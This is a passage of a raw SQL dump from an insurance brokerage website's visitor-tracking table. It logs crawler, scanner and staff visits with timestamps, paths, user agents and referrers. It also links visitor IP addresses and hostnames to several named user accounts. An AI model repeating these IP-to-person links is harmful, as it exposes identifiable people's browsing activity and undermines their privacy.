(https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(14873,'0b_a7c899c7a80a83a450293a5d5e18eb33','1460120955','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14876,'0b_a7c899c7a80a83a450293a5d5e18eb33','1460120957','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14877,'0b_a7c899c7a80a83a450293a5d5e18eb33','1460120959','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14880,'0b_a7c899c7a80a83a450293a5d5e18eb33','1460120967','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(14882,'0b_37510dc3b67e864ac72ea5eb6635f121','1460121278','66.249.66.21','crawl-66-249-66-21.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14883,'0b_fb2b471bb71c1b98528ed7d4504d3e5f','1460121612','209.248.160.178','mail.prioritywire.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://r.search.yahoo.com/_ylt=AwrBT4X6rwdXb_QASIxXNyoA;_ylu=X3oDMTBydWNmY2MwBGNvbG8DYmYxBHBvcwM0BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1460150395/RO=10/RU=http%3a%2f%2fwww.empireins.com%2fcontact%2f/RK=0/RS=d_vfkSv1OC_jORDZJipojVqgGk0-','_ylt=AwrBT4X6rwdXb_QASIxXNyoA;_ylu=X3oDMTBydWNmY2MwBGNvbG8DYmYxBHBvcwM0BHZ0aWQDBHNlYwNzcg--',1,'Win7 x64','IE 11','us','1344 x 840','Yahoo!','','','','','0','0',0),(14885,'0b_fb2b471bb71c1b98528ed7d4504d3e5f','1460121620','209.248.160.178','mail.prioritywire.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/contact/','',0,'Win7 x64','IE 11','us','1344 x 840','','','','','','0','0',0),(14888,'0b_fb2b471bb71c1b98528ed7d4504d3e5f','1460121621','209.248.160.178','mail.prioritywire.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1344 x 840','','','','','','0','0',0),(14891,'0b_52ed0c020e16faf6bde8257e54831c8b','1460123345','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14894,'0b_0845203a9a5ad396348e166ddf2d5768','1460123351','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(14897,'0b_0845203a9a5ad396348e166ddf2d5768','1460123358','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14898,'0b_0845203a9a5ad396348e166ddf2d5768','1460123369','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14900,'0b_600f04cbebd2a05f414c723590107cd3','1460125643','173.220.69.210','ool-addc45d2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','0',0),(14901,'0b_600f04cbebd2a05f414c723590107cd3','1460125653','173.220.69.210','ool-addc45d2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','51',0),(14903,'0b_60b0250a6eedf92963d4ed32ea64036b','1460126184','66.249.66.21','crawl-66-249-66-21.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14904,'0b_d9a6319fc885e1cf395a7a510910f779','1460127218','180.76.15.148','baiduspider-180-76-15-148.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(14907,'0b_043b7954ff1badd579e3d0ba54b1ac19','1460127240','50.252.212.14','50-252-212-14-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/43.0','http://www.empireins.com','',0,'Win7 x64','Firefox 43','gb','','','','','','','0','0',0),(14910,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127699','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14913,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127703','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14916,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127705','184.154.139.23','placeholder.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14919,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127707','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14922,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127709','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14924,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127713','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14927,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127715','184.154.139.23','placeholder.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14928,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127718','184.154.139.23','placeholder.sitelock.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14931,'0b_5d40205fcc6def8d68a8d835a70727aa','1460127719','184.154.139.23','placeholder.sitelock.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14934,'0b_0845203a9a5ad396348e166ddf2d5768','1460128112','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14937,'0b_0845203a9a5ad396348e166ddf2d5768','1460128117','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14939,'0b_0845203a9a5ad396348e166ddf2d5768','1460128124','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14940,'0b_0845203a9a5ad396348e166ddf2d5768','1460128137','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14943,'0b_0845203a9a5ad396348e166ddf2d5768','1460128141','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14945,'0b_8d0feed2642ec11d712d9bf030e57f8c','1460128286','66.249.66.18','crawl-66-249-66-18.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.empireins.com/','',0,'','','us','','','Googlebot','','','','0','0',0),(14946,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128628','68.132.42.42','68.132.42.42','/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','https://www.google.com/','_notprovided_',1,'Android 4','Safari 1','us','360 x 640','Google','','','','','0','0',0),(14948,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128639','68.132.42.42','68.132.42.42','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','0',0),(14951,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128661','68.132.42.42','68.132.42.42','/contact/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','0',0),(14952,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128768','68.132.42.42','68.132.42.42','/about-us/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/contact/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','51',0),(14955,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128780','68.132.42.42','68.132.42.42','/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/about-us/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','51',0),(14958,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128781','68.132.42.42','68.132.42.42','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','0',0),(14961,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128789','68.132.42.42','68.132.42.42','/agent-tools/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','51',0),(14963,'0b_b998aeee0ee12452d0970cd53e3bd9f7','1460128797','68.132.42.42','68.132.42.42','/carriers/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','51',0),(14966,'0b_b2827d44c30ea5132c78f87199792230','1460128882','74.126.55.206','74.126.55.206','/','Mozilla','','',0,'','','','','','','','','','0','0',0),(14967,'0b_4e32822bccd58a94c412aae61617cb82','1460129197','66.249.83.144,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(14969,'0b_0fba7d2cf71c7af434ba72a1db30de25','1460129207','66.102.6.173,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(14970,'0b_024e8fc956e8f6a2cb54e2fb5c2f4c81','1460129500','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14972,'0b_3da27fb5b9904d4b7cb271f0a3070942','1460132157','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14973,'0b_c69763bc5821ea983acdcbc1290f235c','1460132918','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14976,'0b_c69763bc5821ea983acdcbc1290f235c','1460132920','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14979,'0b_0b92bdc01e291e386e9d2207a704c379','1460133011','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(14982,'0b_0b92bdc01e291e386e9d2207a704c379','1460133025','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(14985,'0b_7442bed89530124951728689d7b22bc0','1460134188','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(14988,'0b_635ad9982dc2ff66b1f10172078b0a5a','1460134574','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-status/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14991,'0b_df5ed525658af8737a0453d644586dd5','1460138421','206.210.27.33','proxy3.newyorklife.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','0',0),(14993,'0b_1dd7761da63572253605a589af1618ac','1460138422','206.210.27.33','proxy3.newyorklife.com','/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(14996,'0b_1dd7761da63572253605a589af1618ac','1460138423','206.210.27.33','proxy3.newyorklife.com','/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(14997,'0b_1dd7761da63572253605a589af1618ac','1460138423','206.210.27.33','proxy3.newyorklife.com','/home/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(14999,'0b_1dd7761da63572253605a589af1618ac','1460138424','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15002,'0b_1dd7761da63572253605a589af1618ac','1460138424','206.210.27.33','proxy3.newyorklife.com','/comments/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15003,'0b_df5ed525658af8737a0453d644586dd5','1460138424','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','0',0),(15006,'0b_df5ed525658af8737a0453d644586dd5','1460138465','206.210.27.33','proxy3.newyorklife.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','0',0),(15008,'0b_1dd7761da63572253605a589af1618ac','1460138465','206.210.27.33','proxy3.newyorklife.com','/about-us/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15011,'0b_1dd7761da63572253605a589af1618ac','1460138465','206.210.27.33','proxy3.newyorklife.com','/about-us/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15014,'0b_1dd7761da63572253605a589af1618ac','1460138466','206.210.27.33','proxy3.newyorklife.com','/?p=9','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15015,'0b_1dd7761da63572253605a589af1618ac','1460138516','206.210.27.33','proxy3.newyorklife.com','/meet-the-eib-team/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15017,'0b_1dd7761da63572253605a589af1618ac','1460138517','206.210.27.33','proxy3.newyorklife.com','/?p=347','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15018,'0b_1dd7761da63572253605a589af1618ac','1460138517','206.210.27.33','proxy3.newyorklife.com','/meet-the-eib-team/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15020,'0b_df5ed525658af8737a0453d644586dd5','1460138711','206.210.27.33','proxy3.newyorklife.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/meet-the-eib-team/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15023,'0b_1dd7761da63572253605a589af1618ac','1460138712','206.210.27.33','proxy3.newyorklife.com','/carriers/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15026,'0b_1dd7761da63572253605a589af1618ac','1460138712','206.210.27.33','proxy3.newyorklife.com','/carriers/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15029,'0b_1dd7761da63572253605a589af1618ac','1460138712','206.210.27.33','proxy3.newyorklife.com','/?p=185','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15032,'0b_df5ed525658af8737a0453d644586dd5','1460138731','206.210.27.33','proxy3.newyorklife.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15035,'0b_1dd7761da63572253605a589af1618ac','1460138731','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15038,'0b_df5ed525658af8737a0453d644586dd5','1460138732','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','0',0),(15039,'0b_df5ed525658af8737a0453d644586dd5','1460138742','206.210.27.33','proxy3.newyorklife.com','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15042,'0b_1dd7761da63572253605a589af1618ac','1460138742','206.210.27.33','proxy3.newyorklife.com','/insentives/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15045,'0b_1dd7761da63572253605a589af1618ac','1460138742','206.210.27.33','proxy3.newyorklife.com','/?p=10','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15047,'0b_df5ed525658af8737a0453d644586dd5','1460138760','206.210.27.33','proxy3.newyorklife.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15050,'0b_df5ed525658af8737a0453d644586dd5','1460138763','206.210.27.33','proxy3.newyorklife.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15053,'0b_1dd7761da63572253605a589af1618ac','1460138764','206.210.27.33','proxy3.newyorklife.com','/agent-tools/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15056,'0b_1dd7761da63572253605a589af1618ac','1460138764','206.210.27.33','proxy3.newyorklife.com','/?p=181','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15057,'0b_1dd7761da63572253605a589af1618ac','1460138765','206.210.27.33','proxy3.newyorklife.com','/agent-tools/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15059,'0b_1dd7761da63572253605a589af1618ac','1460138766','206.210.27.33','proxy3.newyorklife.com','/contact/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15060,'0b_1dd7761da63572253605a589af1618ac','1460138766','206.210.27.33','proxy3.newyorklife.com','/contact/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15062,'0b_1dd7761da63572253605a589af1618ac','1460138766','206.210.27.33','proxy3.newyorklife.com','/?p=8','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15065,'0b_df5ed525658af8737a0453d644586dd5','1460138907','206.210.27.33','proxy3.newyorklife.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15066,'0b_1dd7761da63572253605a589af1618ac','1460138908','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15068,'0b_df5ed525658af8737a0453d644586dd5','1460138908','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','0',0),(15069,'0b_df5ed525658af8737a0453d644586dd5','1460138928','206.210.27.33','proxy3.newyorklife.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15072,'0b_1dd7761da63572253605a589af1618ac','1460138929','206.210.27.33','proxy3.newyorklife.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15074,'0b_1dd7761da63572253605a589af1618ac','1460138929','206.210.27.33','proxy3.newyorklife.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15077,'0b_1dd7761da63572253605a589af1618ac','1460138930','206.210.27.33','proxy3.newyorklife.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15078,'0b_1dd7761da63572253605a589af1618ac','1460138930','206.210.27.33','proxy3.newyorklife.com','/?p=277','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15081,'0b_1dd7761da63572253605a589af1618ac','1460138930','206.210.27.33','proxy3.newyorklife.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15084,'0b_1dd7761da63572253605a589af1618ac','1460138930','206.210.27.33','proxy3.newyorklife.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15086,'0b_1dd7761da63572253605a589af1618ac','1460138930','206.210.27.33','proxy3.newyorklife.com','/?p=288','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown 